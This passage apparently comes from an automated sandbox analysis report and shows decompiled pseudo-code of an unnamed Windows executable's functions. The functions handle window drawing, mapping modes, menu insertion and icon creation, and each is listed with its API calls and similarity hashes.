					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004375F8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00439EA4(_t82, _t99, 0x14, 0);
				E00439EA4(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004140D0( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043D44C(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

0x0043d457
0x0043d459
0x0043d45b
0x0043d467
0x0043d471
0x0043d483
0x0043d488
0x0043d48c
0x0043d4a1
0x0043d4bb
0x0043d4c0
0x0043d4c5
0x0043d4c7
0x0043d4ce
0x0043d4ce
0x0043d4a3
0x0043d4a3
0x0043d4aa
0x0043d4aa
0x0043d4d5
0x0043d4e7
0x0043d4f6
0x0043d503
0x0043d51b
0x0043d51b
0x0043d52b
0x0043d53b
0x0043d540
0x0043d548
0x0043d587
0x0043d58c
0x0043d591
0x0043d59d
0x0043d54a
0x0043d54d
0x0043d550
0x00000000
0x00000000
0x0043d553
0x0043d556
0x0043d55d
0x0043d566
0x0043d56b
0x0043d56f
0x0043d57a
0x0043d57a
0x0043d57f
0x0043d582
0x0043d582
0x0043d582
0x00000000
0x0043d55d

APIs

SaveDC.GDI32 ref: 0043D462

Part of subcall function 004375F8: GetWindowOrgEx.GDI32(?), ref: 00437606
Part of subcall function 004375F8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0043761C

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D483
GetWindowLongA.USER32 ref: 0043D499
GetWindowLongA.USER32 ref: 0043D4BB
SetRect.USER32 ref: 0043D4E7
DrawEdge.USER32(?,?,?,00000000), ref: 0043D4F6
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043D51B
RestoreDC.GDI32(?,?), ref: 0043D58C

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: 3b574ab7a52829840e4cd3b1f15a3d061a7059c29f6c65f29678ab16ad4aac27
Instruction ID: d32336d68219eb1ec227aa2ba040feeea10fbb9f3596117a72abf0e85f1a3c6b
Opcode Fuzzy Hash: 3b574ab7a52829840e4cd3b1f15a3d061a7059c29f6c65f29678ab16ad4aac27
Instruction Fuzzy Hash: 5B418271B00214ABDB00EAA9CC81F9F73B8AF48304F10406AF915EB3D2D67CED0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 004602B4, Relevance: 12.1, APIs: 8, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004602B4(void* __eax, void* __edx) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t111;

				_t97 = __eax;
				if(__edx == 0) {
					E00412A88(0, _t111, 0);
					E00412A88(1,  &_v12, 1);
					SetMapMode(E00420244( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E00438704(_t97);
					_t55 = E004386C0(_t97);
					SetViewportExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E00438704(_t97);
					_t63 = E004386C0(_t97);
					return SetWindowExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412A88(E00412A88(E004386C0(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
				SetMapMode(E00420244( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E00438704(_t97);
				_t84 = E004386C0(_t97);
				SetViewportExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E00438704(_t97);
				_t92 = E004386C0(_t97);
				return SetWindowExtEx(E00420244( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}

0x004602b8
0x004602bc
0x0046036c
0x0046037f
0x00460392
0x004603af
0x004603b8
0x004603c0
0x004603d2
0x004603db
0x004603e7
0x00000000
0x004603fd
0x004602de
0x004602f1
0x0046030e
0x00460317
0x0046031f
0x00460331
0x0046033a
0x00460346
0x00000000

APIs

SetMapMode.GDI32(00000000,00000008), ref: 004602F1
SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0046030E
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 00460331
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0046035C
SetMapMode.GDI32(00000000,00000008), ref: 00460392
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 004603AF
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 004603D2
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 004603FD

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ModeViewport
String ID:
API String ID: 3149394475-0
Opcode ID: 73698d7bde0de6fa8cd98994edfe652ec0af4056aaec0416285354e355b5b6de
Instruction ID: 689bb9299ad6ed34ff998fa525b3a6a811491218c4ec6300ff358f430385186f
Opcode Fuzzy Hash: 73698d7bde0de6fa8cd98994edfe652ec0af4056aaec0416285354e355b5b6de
Instruction Fuzzy Hash: 83310B707443016BD740FA7ACC8BB4B62989F48308F04597EB599EB2A3CE7DE8954729

Uniqueness

Uniqueness Score: -1.00%

Function 00420B7C, Relevance: 12.1, APIs: 8, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00420B7C(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E00402994(_t24, 0x40,  &_v1032);
				_push(0);
				L00406E30();
				_v8 = _t25;
				_push(_t54);
				_push(0x420c79);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406B00();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406B40();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406B40();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406B40();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406B40();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406B40();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00420C80);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407090();
				return _t29;
			}

0x00420b7d
0x00420b86
0x00420b8f
0x00420ba3
0x00420ba8
0x00420baa
0x00420baf
0x00420bb4
0x00420bb5
0x00420bba
0x00420bbd
0x00420bc0
0x00420bc2
0x00420bc5
0x00420bc6
0x00420bcb
0x00420bd0
0x00420bdc
0x00420bdd
0x00420bdf
0x00420be4
0x00420be5
0x00420bf4
0x00420c50
0x00420c51
0x00420c56
0x00420c5a
0x00420c5b
0x00420bf6
0x00420bfc
0x00420bfd
0x00420c04
0x00420c08
0x00420c09
0x00420c1c
0x00420c1d
0x00420c22
0x00420c26
0x00420c27
0x00420c32
0x00420c33
0x00420c35
0x00420c3a
0x00420c3b
0x00420c3b
0x00420bf4
0x00420c62
0x00420c65
0x00420c68
0x00420c6d
0x00420c70
0x00420c71
0x00420c73
0x00420c78

APIs

7378AC50.USER32(00000000), ref: 00420BAA
7378AD70.GDI32(?,00000068,00000000,00420C79,?,00000000), ref: 00420BC6
7378AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420BE5
7378AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420C09
7378AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00420C79), ref: 00420C27
7378AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 00420C3B
7378AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00420C79,?,00000000), ref: 00420C5B
7378B380.USER32(00000000,?,00420C80,00420C79,?,00000000), ref: 00420C73

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$B380
String ID:
API String ID: 817970651-0
Opcode ID: ab7b0c4230b43bcc77b16b5e02aa112d977b6b6fc4ed4ff17240baf5f0a39223
Instruction ID: 2fba6fd25629883dca0f1e4ea6d0808ad623a491012ca4e8f6240949a9184519
Opcode Fuzzy Hash: ab7b0c4230b43bcc77b16b5e02aa112d977b6b6fc4ed4ff17240baf5f0a39223
Instruction Fuzzy Hash: 412188F1A00218BBDB10DBA5CD95FAE73BCEB08704F5105A6F704F61C1D6786E508728

Uniqueness

Uniqueness Score: -1.00%

Function 0046B9CC, Relevance: 10.7, APIs: 7, Instructions: 199
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0046B9CC(intOrPtr* __eax, signed int __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v5;
				char _v6;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				char _v52;
				char _v56;
				signed char _t93;
				signed int _t177;
				intOrPtr* _t211;
				void* _t213;
				void* _t214;
				void* _t216;

				_t215 = _t216;
				_v56 = 0;
				_t213 = __edx;
				_t211 = __eax;
				 *[fs:eax] = _t216 + 0xffffffcc;
				E004202C4( *((intOrPtr*)(__eax + 0x218)),  *((intOrPtr*)(__edx + 0x18)));
				_t179 =  *_t211;
				 *((intOrPtr*)( *_t211 + 0x44))( *[fs:eax], 0x46bc49, _t216, __edi, __esi, __ebx, _t214);
				_t93 =  *(__edx + 0x10);
				_t177 = __ebx & 0xffffff00 | (_t93 & 0x00000001) != 0x00000000;
				_v5 = (_t93 & 0x00000010) != 0;
				if( *((intOrPtr*)( *_t211 + 0x50))() != 0) {
					__eflags = _t177;
					if(_t177 == 0) {
						_v6 = 0;
					} else {
						_v6 = 2;
					}
				} else {
					_v6 = 1;
				}
				_v12 = 0x2010;
				if(_t177 != 0) {
					_v12 = _v12 | 0x00000200;
				}
				if(( *(_t213 + 0x10) & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000100;
				}
				_t225 =  *(_t211 + 0x22c) | _v5;
				if(( *(_t211 + 0x22c) | _v5) != 0) {
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 0x80000006, _t211, _t215);
					E0041F5E4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 1, _t211, _t215);
					E0041F8D4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t179, 1, _t211, _t215, _t225);
					_t179 = _v28.top;
					E0041FF8C( *((intOrPtr*)(_t211 + 0x218)), _v28.top, _v28.left, _v28.bottom, _v28.right);
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				_t226 = _t177;
				if(_t177 == 0) {
					DrawFrameControl( *(_t213 + 0x18),  &_v28, 4, _v12);
				} else {
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 0x80000010, _t211, _t215);
					E0041F5E4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 1, _t211, _t215);
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t179, 0x8000000f, _t211, _t215, _t226);
					E0041FF8C( *((intOrPtr*)(_t211 + 0x218)), _v28.top, _v28.left, _v28.bottom, _v28.right);
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				if( *(_t211 + 0x22c) != 0) {
					 *((intOrPtr*)( *_t211 + 0x44))();
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				E00420140( *((intOrPtr*)(_t211 + 0x218)));
				_t228 = _t177;
				if(_t177 != 0) {
					OffsetRect( &_v28, 1, 1);
				}
				E00412A88(0,  &_v52, 0);
				E00438CBC(_t211,  &_v56);
				E0046ABAC( *((intOrPtr*)(_t211 + 0x21c)),  &_v28,  *((intOrPtr*)(_t211 + 0x218)),  &_v44, E0043AFD4(_t211, 0, _t228), 0, _v6,  *((intOrPtr*)(_t211 + 0x224)),  *((intOrPtr*)(_t211 + 0x228)),  *((intOrPtr*)(_t211 + 0x222)), _v56,  &_v52);
				_t229 =  *(_t211 + 0x22c) & _v5;
				if(( *(_t211 + 0x22c) & _v5) != 0) {
					_t184 =  *_t211;
					 *((intOrPtr*)( *_t211 + 0x44))();
					InflateRect( &_v28, 0xfffffffc, 0xfffffffc);
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)),  *_t211, 0x80000006, _t211, _t215);
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t184, 0x8000000f, _t211, _t215, _t229);
					DrawFocusRect(E00420244( *((intOrPtr*)(_t211 + 0x218))),  &_v28);
				}
				E004202C4( *((intOrPtr*)(_t211 + 0x218)), 0);
				 *[fs:eax] = 0;
				_push(0x46bc50);
				return E00404320( &_v56);
			}

0x0046b9cd
0x0046b9d7
0x0046b9da
0x0046b9dc
0x0046b9e9
0x0046b9f5
0x0046b9ff
0x0046ba01
0x0046ba04
0x0046ba09
0x0046ba0e
0x0046ba1b
0x0046ba23
0x0046ba25
0x0046ba2d
0x0046ba27
0x0046ba27
0x0046ba27
0x0046ba1d
0x0046ba1d
0x0046ba1d
0x0046ba31
0x0046ba3a
0x0046ba3c
0x0046ba3c
0x0046ba47
0x0046ba49
0x0046ba49
0x0046ba56
0x0046ba59
0x0046ba69
0x0046ba7c
0x0046ba8c
0x0046ba99
0x0046baa5
0x0046bab2
0x0046bab2
0x0046bab7
0x0046bab9
0x0046bb2a
0x0046babb
0x0046bac9
0x0046badc
0x0046baef
0x0046bb08
0x0046bb15
0x0046bb15
0x0046bb36
0x0046bb3f
0x0046bb4a
0x0046bb4a
0x0046bb58
0x0046bb5d
0x0046bb5f
0x0046bb69
0x0046bb69
0x0046bb75
0x0046bb83
0x0046bbc4
0x0046bbcf
0x0046bbd2
0x0046bbd9
0x0046bbdb
0x0046bbe6
0x0046bbf9
0x0046bc0c
0x0046bc21
0x0046bc21
0x0046bc2e
0x0046bc38
0x0046bc3b
0x0046bc48

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 0046BAB2
InflateRect.USER32(?,000000FF,000000FF), ref: 0046BB15
DrawFrameControl.USER32 ref: 0046BB2A
InflateRect.USER32(?,000000FF,000000FF), ref: 0046BB4A
OffsetRect.USER32(?,00000001,00000001), ref: 0046BB69
InflateRect.USER32(?,000000FC,000000FC), ref: 0046BBE6
DrawFocusRect.USER32 ref: 0046BC21

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Inflate$Draw$ControlFocusFrameOffset
String ID:
API String ID: 92361559-0
Opcode ID: f1157a3c78035951a8d672163aed3e7d3c2b2b766211cf9721d7175d1e63f6f2
Instruction ID: b9720ecdf5906d56ef7a4a5ac6f34af7b7fdd1df251f1003558a8b10291c5349
Opcode Fuzzy Hash: f1157a3c78035951a8d672163aed3e7d3c2b2b766211cf9721d7175d1e63f6f2
Instruction Fuzzy Hash: 4F81A074B00205AFC704DBA8C885EDEF7F5BF09314F14425AB524D7392DB38A986CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00448AC4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00448AC4(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x448d1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x448d26);
					E00404320( &_v68);
					return E00404320( &_v12);
				}
				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044A900(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x471aa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x448d44) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00471A94 |  *0x00471A84 |  *0x00471A8C | 0x00000400;
							_t103 = E0044A900(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
							} else {
								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00448FC8(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044AEBC(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044A4D8(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x471ad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x448d44) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00471ACC |  *0x00471AA8 |  *0x00471ADC |  *0x00471AE4;
							_v61.fState =  *0x00471AB4 |  *0x00471AC4 |  *0x00471ABC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047D0(_v12);
							if(E0044A900(_t154) > 0) {
								_v61.hSubMenu = E00448FC8(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x448d38);
						E00448128( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404698();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x4479b8; // 0x447a04
					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00448FC8(_t154);
				goto L8;
			}

0x00448ac4
0x00448acf
0x00448ad2
0x00448ad5
0x00448ad8
0x00448ada
0x00448ade
0x00448adf
0x00448ae4
0x00448ae7
0x00448aee
0x00448d01
0x00448d03
0x00448d06
0x00448d09
0x00448d11
0x00448d1e
0x00448d1e
0x00448afa
0x00448b08
0x00448b16
0x00448b1b
0x00448b60
0x00448b6e
0x00448cba
0x00448cc2
0x00448cc7
0x00448cc9
0x00448cfc
0x00448ccb
0x00448cce
0x00448ce3
0x00448ce3
0x00000000
0x00448cc9
0x00448b74
0x00448b7b
0x00448b89
0x00448b8d
0x00448ba4
0x00448bb2
0x00448bb2
0x00000000
0x00448bb2
0x00448bae
0x00448bb0
0x00000000
0x00000000
0x00000000
0x00448bb6
0x00448bb6
0x00448bb6
0x00448bb8
0x00448bb8
0x00448c07
0x00448c2e
0x00448c35
0x00448c3a
0x00448c3f
0x00448c44
0x00448c4f
0x00448c5b
0x00448c64
0x00448c64
0x00448c70
0x00000000
0x00448c70
0x00448b8d
0x00448b1d
0x00448b20
0x00448b22
0x00448b3c
0x00448b3c
0x00448b3f
0x00448b4b
0x00448b50
0x00448b5b
0x00000000
0x00448b5b
0x00448b24
0x00448b28
0x00000000
0x00000000
0x00448b2d
0x00448b33
0x00448b38
0x00448b3a
0x00000000
0x00000000
0x00000000
0x00448b3a
0x00448b11
0x00000000

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00448C70
GetVersion.KERNEL32(00000000,00448D1F), ref: 00448B60

Part of subcall function 00448FC8: CreatePopupMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FE3

Strings

?, xrefs: 00448B7B
,, xrefs: 00448B74

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?
API String ID: 133695497-2308483597
Opcode ID: 2cee81f7da8462bb22156a7dd72272cd01dcde12bcc3e6a75ab37ec6e1055d1c
Instruction ID: 3620e664f0735d637a3e35fb76017f0ab40181e751d50135783bd704d95edd67
Opcode Fuzzy Hash: 2cee81f7da8462bb22156a7dd72272cd01dcde12bcc3e6a75ab37ec6e1055d1c
Instruction Fuzzy Hash: 6961E270A102449FEB10EF79D88169E77F6BF4A304F44447AE944E73A6DB38E845C758

Uniqueness

Uniqueness Score: -1.00%

Function 0042116C, Relevance: 10.7, APIs: 7, Instructions: 166
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042116C() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E00420FE0( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E00420FE0( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420FEC( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E00408334(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x421353, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E00420E24( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E00408334( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x421330);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x48f714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
